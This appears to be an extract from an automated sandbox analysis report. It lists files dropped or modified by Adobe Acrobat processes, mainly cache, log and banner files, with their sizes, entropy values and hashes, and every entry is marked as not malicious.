SSDEEP: | 3:h6W/lKYeOMpDNaAPaU1lajzv4pwlluxmO+l/SNxOf:hdlKzzNDPaUijDpgmOH |
MD5: | 01DCBCD035625C7BF92ED9DBDBAD7C1D |
SHA1: | FA6B16AA8DB9C39A219915C180907C82A6886FB9 |
SHA-256: | 7001AF288A9D3C1B096DA570269AD043A7FB90C17592EF81DB71B65702BFC0E8 |
SHA-512: | B9FC02D1F948B894E34DA43918D5CC8832A256D5683E624B25E6BEAA6F59C2B37292449A5F0FBFDA3CF243BE1D39914B44F1857ACE4DD3055EB49D5836EB42E9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.195345943356902 |
Encrypted: | false |
SSDEEP: | 6:iO4VhEf9+q2PN72nKuAl9OmbnIFUtSVhxDN2WZmwsVhxDN9VkwON72nKuAl9Omb5:7UEl+vVaHAahFUtaxDN2W/IxDN9V5OaC |
MD5: | 61BD9888DF9A9F18ADCAAD6DAD819243 |
SHA1: | FB1D32F41BC4FE3C5536655802ABC0C594A84EC4 |
SHA-256: | 2C35744C2150624A9291A28B919A7C5F16E76D2566356A275E240B2A1B91378F |
SHA-512: | D9B9BD4D2399FE13742623D0DFE0834C41FAD8095E5FEB09D20229216A7887BF4F74DBB0939623C46E34AAC5A2B807A6E306914F685F42BD3CE9C1F5C4B9DB89 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.195345943356902 |
Encrypted: | false |
SSDEEP: | 6:iO4VhEf9+q2PN72nKuAl9OmbnIFUtSVhxDN2WZmwsVhxDN9VkwON72nKuAl9Omb5:7UEl+vVaHAahFUtaxDN2W/IxDN9V5OaC |
MD5: | 61BD9888DF9A9F18ADCAAD6DAD819243 |
SHA1: | FB1D32F41BC4FE3C5536655802ABC0C594A84EC4 |
SHA-256: | 2C35744C2150624A9291A28B919A7C5F16E76D2566356A275E240B2A1B91378F |
SHA-512: | D9B9BD4D2399FE13742623D0DFE0834C41FAD8095E5FEB09D20229216A7887BF4F74DBB0939623C46E34AAC5A2B807A6E306914F685F42BD3CE9C1F5C4B9DB89 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 342 |
Entropy (8bit): | 5.1406731018886225 |
Encrypted: | false |
SSDEEP: | 6:iO4Vhmq2PN72nKuAl9Ombzo2jMGIFUtSVhHBZmwsVhHbkwON72nKuAl9Ombzo2jz:7UmvVaHAa8uFUtah/I75OaHAa8RJ |
MD5: | B42321483DEBEB6B1A19E1718BC15B14 |
SHA1: | 8528BE5413D129FFE7AB01528EC223884A1E7197 |
SHA-256: | A4F51B60BAD57E8692A42CE73F595C9651E24D23383EB4837B4B0FE07FBFD06F |
SHA-512: | EECF579CF1B91947B2F0B27259203B743F94E2144376CFE57737F2101ABCF35B3AEA2FFFC2B8665445DBFE9F7EFDC223A7BEC26284A34F3F30C1AF2F5291CCFE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 342 |
Entropy (8bit): | 5.1406731018886225 |
Encrypted: | false |
SSDEEP: | 6:iO4Vhmq2PN72nKuAl9Ombzo2jMGIFUtSVhHBZmwsVhHbkwON72nKuAl9Ombzo2jz:7UmvVaHAa8uFUtah/I75OaHAa8RJ |
MD5: | B42321483DEBEB6B1A19E1718BC15B14 |
SHA1: | 8528BE5413D129FFE7AB01528EC223884A1E7197 |
SHA-256: | A4F51B60BAD57E8692A42CE73F595C9651E24D23383EB4837B4B0FE07FBFD06F |
SHA-512: | EECF579CF1B91947B2F0B27259203B743F94E2144376CFE57737F2101ABCF35B3AEA2FFFC2B8665445DBFE9F7EFDC223A7BEC26284A34F3F30C1AF2F5291CCFE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\41100a93-4a57-48c3-9da5-bb05eb4cb44f.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.969340035861989 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqFSsBdOg2Hrcaq3QYiubcP7E4T3y:Y2sRdsEdMHS3QYhbA7nby |
MD5: | 60400A61CBD21D4A80BE87568DF2A91B |
SHA1: | 8BD6EBDFBBD363014BE52A75E5555FAEFAE9F7E2 |
SHA-256: | 42C5562FFA255487ED9D46D5BF8C60FD2CC535AF0E0B4D28FC5693D5CB90BC22 |
SHA-512: | 057013BB17211575E4058DE7A91E5C276A4A9CD2656F59C2DF9D165B9AE5493E1C56BFF0024A0BCFA65BB31215919831B8A8E57A13CC0C7721CD0B976C4DBA5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.969340035861989 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqFSsBdOg2Hrcaq3QYiubcP7E4T3y:Y2sRdsEdMHS3QYhbA7nby |
MD5: | 60400A61CBD21D4A80BE87568DF2A91B |
SHA1: | 8BD6EBDFBBD363014BE52A75E5555FAEFAE9F7E2 |
SHA-256: | 42C5562FFA255487ED9D46D5BF8C60FD2CC535AF0E0B4D28FC5693D5CB90BC22 |
SHA-512: | 057013BB17211575E4058DE7A91E5C276A4A9CD2656F59C2DF9D165B9AE5493E1C56BFF0024A0BCFA65BB31215919831B8A8E57A13CC0C7721CD0B976C4DBA5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 5449 |
Entropy (8bit): | 5.2494393918470985 |
Encrypted: | false |
SSDEEP: | 96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7YZlt:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzhc |
MD5: | A700DB4597B7AACD952775AFDC05BF94 |
SHA1: | 528B8408E2EB4A08286347BA4D55574ECE7FDF12 |
SHA-256: | D286A5746461FB4943C2672C8444887B5A2EDE71B6B6192784F013ABAB880F8D |
SHA-512: | E06FDE2F9E849F44CBA5E3993720171BB7457680446CAE5CB2E0D7DDA90A5FD78000D98F4F253E0BBC08C171B4FA99EF8497B8FED41C51D1C57868722A5E6527 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 5.174897834476862 |
Encrypted: | false |
SSDEEP: | 6:iO4VhmAq2PN72nKuAl9OmbzNMxIFUtSVheuZmwsVheCkwON72nKuAl9OmbzNMFLJ:7UzvVaHAa8jFUtaeu/IeC5OaHAa84J |
MD5: | 36870597AE04E39867F9990A77B430FB |
SHA1: | 75B40204FF4AFC7889B440E567548492ECB01D0D |
SHA-256: | 194C4D3A3680DE19EAAEE096A6AC822F972D77C184FA492D39B1A5B86154F0A1 |
SHA-512: | 6C036BE4DACC5DDAD01A3F2436283B732EDE773ABE68404D5B1A82B960BB3C545F145114C0EC3B6BDCB10AC0538566073F7F053AAEEFCC933D4E1C8516771C2C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 5.174897834476862 |
Encrypted: | false |
SSDEEP: | 6:iO4VhmAq2PN72nKuAl9OmbzNMxIFUtSVheuZmwsVheCkwON72nKuAl9OmbzNMFLJ:7UzvVaHAa8jFUtaeu/IeC5OaHAa84J |
MD5: | 36870597AE04E39867F9990A77B430FB |
SHA1: | 75B40204FF4AFC7889B440E567548492ECB01D0D |
SHA-256: | 194C4D3A3680DE19EAAEE096A6AC822F972D77C184FA492D39B1A5B86154F0A1 |
SHA-512: | 6C036BE4DACC5DDAD01A3F2436283B732EDE773ABE68404D5B1A82B960BB3C545F145114C0EC3B6BDCB10AC0538566073F7F053AAEEFCC933D4E1C8516771C2C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.444698281723233 |
Encrypted: | false |
SSDEEP: | 384:SeEci5ttiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:sGs3OazzU89UTTgUL |
MD5: | 3A99D5A23FE599F1496455B2EF0E193D |
SHA1: | A72600DFF554C36FF32DD6BF2D0D22392114A84B |
SHA-256: | 5D9460C4C3E2140A7F51166D01370379BF246FB8F6ACF8DF73CC31803B02792C |
SHA-512: | 083F52F8A8D3B2AE3EDD4EC59F58D08F35AAB407EB41182EAE4C49EAAB781A4D5DC8B02AEDAAC3F7B25A3CAF993DC283D69899C011C7BA38C21FFA97CD1D5CBD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.213799750363114 |
Encrypted: | false |
SSDEEP: | 24:7+tyDnuwKnqLLzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9MA:7MCnCnqPmFTIF3XmHjBoGGR+jMz+LhB |
MD5: | A21E0F1E5DBF7E823DAD493742AC1200 |
SHA1: | CF07496612A77621A94AB3DAA77EC4D335E5F29B |
SHA-256: | 3139B805E8C851B9D4F62598BA54156CE8B2AE7DA6A5C605B7EBB3EBE77C0DA7 |
SHA-512: | B54E4AB78D4EBB805B5E17017901AE6BB6B91698EA15EDEC9013E518061D398A7B9AD7637DEDD899C285272E8115472C928A7574E93EDA2398CD760B9C95BAD9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7425532007658724 |
Encrypted: | false |
SSDEEP: | 3:kkFkl1NrGpttfllXlE/HT8kvW1NNX8RolJuRdxLlGB9lQRYwpDdt:kKHteT8myNMa8RdWBwRd |
MD5: | 8263CFB5203F0E24B68054548280D146 |
SHA1: | C4363F6EAC15D2A97B4769E065813AEB7502D4D7 |
SHA-256: | 5D4AD407DAF220F3FEDD8B5CD21B615E2582397BED346DE0AB4980B39BBDA5D8 |
SHA-512: | 5FF13A699343FCCDC2F8FC81BA6D257D07AF18F1570AEAFC16A45DDB25AC6B06B10896DE314BC421D8070B945F8C1EDFCD7C4FFA28F5FDEC0A1AB5C494AE3FCE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 328 |
Entropy (8bit): | 3.2175376354855065 |
Encrypted: | false |
SSDEEP: | 6:kK5kMyL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:hyiDImsLNkPlE99SNxAhUe/3 |
MD5: | 9F8DAB8803A5260878B99812F6A0AAE8 |
SHA1: | D2AC846AA17D3771BB60C2EFFEBA7285B63C5BFF |
SHA-256: | 89894EA3C364E4A91B3398188FABF371A5AD19DBC7F924E3633E5A30543F8744 |
SHA-512: | 26BF993596D4EE93C03564A3A948639AB3D9CBF36DCEF0B61B16E69F0D1D01D33334BE326B436E05865738B02789E552AD9859D44A1A1BC9D33A42E3B8623428 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.3614054865704714 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXF28XVXCO0nZiQ0YL3oAvJM3g98kUwPeUkwRe9:YvXKXFJUO0cyYGMbLUkee9 |
MD5: | 6B0F22EC61B946F4BC53DA81DAE899EE |
SHA1: | A8B9A02A3FA91EE3AFC49B9351F382D5CB97F589 |
SHA-256: | AD5219D1674AAB45068456B3FDDCD4A92608EA84CFC065F2276958464ED877A3 |
SHA-512: | 70BAB9717E2AD593C100C7CAFD9BB902CA5A18318D5D788CC5EBD98CEB490CB8E38A71F52B414D80EA6029FF9A37CDB7039DBE26FC4EB73C0D105C7D18BA5AD7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.315440340837404 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXF28XVXCO0nZiQ0YL3oAvJfBoTfXpnrPeUkwRe9:YvXKXFJUO0cyYGWTfXcUkee9 |
MD5: | C5F2B4E40DA7C11E64EF7D010FFF0363 |
SHA1: | B27CBD894A234DEF6D4CCAC09F713F8E16B1D934 |
SHA-256: | BCDF381EE1C62FBED38D2CAB8262F1245B29783162DD1B4C468657E5D2D01B64 |
SHA-512: | 5F96F3E6EFF455B0F3BE6DEC7A23095053F59E07AD29E631C5CAD4903FB9B1DD67C2C36EE5B4F227119BC181152D677FF318C2358361740A16323919F8F13BC4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.294638088806608 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXF28XVXCO0nZiQ0YL3oAvJfBD2G6UpnrPeUkwRe9:YvXKXFJUO0cyYGR22cUkee9 |
MD5: | 3DA853C0CDEB2D05448DF29D252C46F3 |
SHA1: | 4E146DEB3A8AD82B7994C930DF2BE44EF63D0A44 |
SHA-256: | 7B756E1B9305EE99BCB25480332CD32C3E62D29CD795D57FAC10AF98A762464A |
SHA-512: | FCEF6A236936F6D418824E31760900605CA862562CD8673F5C73DA2DEAEA70968D5BBBDAF62CCD8DC3C0E5A7D31EA746E93C36574CF2769725842EC6895D5374 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.341359363997681 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXF28XVXCO0nZiQ0YL3oAvJfPmwrPeUkwRe9:YvXKXFJUO0cyYGH56Ukee9 |
MD5: | 059829B296DC7BDF2AF50C0E2AF16DD8 |
SHA1: | 2F751AE19057F0FE9DBE583198A849B251245BDB |
SHA-256: | 0BA796EC54D890A7F50C22EF7D47302D8DD845AD99B7577B0987101F332E5FEA |
SHA-512: | E63D89C441C5DC90DDC7315A4EA1FACCF2174FEC0790C91935BEC107763E2B486EACF3995E0A64137269DC3340711019305622883820EF766618127D2D4E31B9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.693274750440961 |
Encrypted: | false |
SSDEEP: | 24:Yv6XDZZUpLgE9cQx8LennAvzBvkn0RCmK8czOCCSf:Yv8Uhgy6SAFv5Ah8cv/f |
MD5: | 645030B340CE4E87AAA91958BADD9B5F |
SHA1: | 69B8B2DA7918EF01C28192688652E9C06D551122 |
SHA-256: | 1F55F5F452F89FDE630640E1509984832449DE06A6062D1D4C0D4076E5EA0D45 |
SHA-512: | 1B1512702E71D6FF75B7201C7D6A04905BD3F533DA6D66763FA592201A889A9E69350E68DAD0CF42998985A1BCBC570A07A4CFB439AEB72AF352691223AEF4FB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.292442587133814 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXF28XVXCO0nZiQ0YL3oAvJf8dPeUkwRe9:YvXKXFJUO0cyYGU8Ukee9 |
MD5: | 918F78E6F5AFDEE7D6189A4590FB1E55 |
SHA1: | AC7CDB9A50236BB734ACC1E3EA1D3D4315A4771A |
SHA-256: | 1E86D2E18FE787A918FD5E1C83DCD95F3D739ECA9518FCD0562A6B7AE0DFC0E5 |
SHA-512: | 84A6C86594EEB070783836D7E7D2B20A582671895D3DB5C713EE3CDDD1763CC3463934797CA15C15A5B8C6B0AF85A158759D328B6E4B013F60A23A643FBCECB1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.295463283324754 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXF28XVXCO0nZiQ0YL3oAvJfQ1rPeUkwRe9:YvXKXFJUO0cyYGY16Ukee9 |
MD5: | 2D44B9978684C67905DF5D48211E6BCE |
SHA1: | 2DA049ABE0A0EC7F7480D7A0AA6426773231ACF3 |
SHA-256: | C2F43420E0F447BB2778B35FB0E6542C5DEB0A80B36903F1C3CA819E4C96D5D3 |
SHA-512: | B53ABBE7F8F43155225E0D5D5D4724B515598A451117B2E5D67652A8719320F938B6EC58BB7CD2BB4656C2DE7C6730E5443811BA6FE9490750C6A4E50B690731 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.30187127170036 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXF28XVXCO0nZiQ0YL3oAvJfFldPeUkwRe9:YvXKXFJUO0cyYGz8Ukee9 |
MD5: | 009F319750C1DDD06CD4019057D84E16 |
SHA1: | 15F7F49C61887B6CE9B3DBEAC3E58C1AE87FDE5A |
SHA-256: | EAB269CD44D84565D10657B7BCFA6F63F44473573BCDB584A92C11A591DBB9D0 |
SHA-512: | 62261991B77BF2B4701BEB733BE63E39B6CE663E8F4C5B2C94861C21846476A7D583BFB1B73CA654F19E45E14DE8B120CDC083DECF545E8FE2565CCA546CF4FC |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.318526327080429 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXF28XVXCO0nZiQ0YL3oAvJfzdPeUkwRe9:YvXKXFJUO0cyYGb8Ukee9 |
MD5: | 09A76C214FEBA02978C4C3E79BE5BCE4 |
SHA1: | FE5BA47CED690C25E1D2A3509B0ADC891855F253 |
SHA-256: | 23F64AB1E5ADD6F1A3C0AC9472F534F0FEE78F5345C80B5A155125A1B85960B1 |
SHA-512: | CBCE191E54691E648098EB2000D4595797C2051FA2B47ADC3EA4ECD6E5B759DBBCD16B46F05E9FCFD692E2D4667E4AF5E813DED1B8934F5EB66A1436C8E82FA7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.29915268659104 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXF28XVXCO0nZiQ0YL3oAvJfYdPeUkwRe9:YvXKXFJUO0cyYGg8Ukee9 |
MD5: | 94B543A26DD8B5DCCDE1B505208172C0 |
SHA1: | 90374A60242EAB13BCE88D62FE3A5DFD674C1173 |
SHA-256: | 0FA50EC7F65C612990EFDC1052B0230959F4F8A303CDC017AF80C2512D331E78 |
SHA-512: | B87AC598643D006829A3678314DE885D56D482B57B07BDC6A2211CB91BF1DBB9292094D67F36F31AF3A55AFAC0300E30F169B3B486C2D2B9C33612467218A101 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.28518814192432 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXF28XVXCO0nZiQ0YL3oAvJf+dPeUkwRe9:YvXKXFJUO0cyYG28Ukee9 |
MD5: | F1F7629C41C35A7BE48324B74C9CD571 |
SHA1: | 1FAD8031294D1124BADCEAD9D006A10614FA1170 |
SHA-256: | 74CB6B3E638E5E6B4FBB0C28CF9E4BCE9DD9D91EC52DB44456B344E76391A423 |
SHA-512: | 944D36C8F6CA08AB38F5D7D598892353824FEADF0BF989B05A1839F7CB26DE83A4DFBF81E6ACC5EB3725178D4D511397B08B21E73A58C5BD7510C5A6A7C86743 |
Malicious: | false |
Preview: |
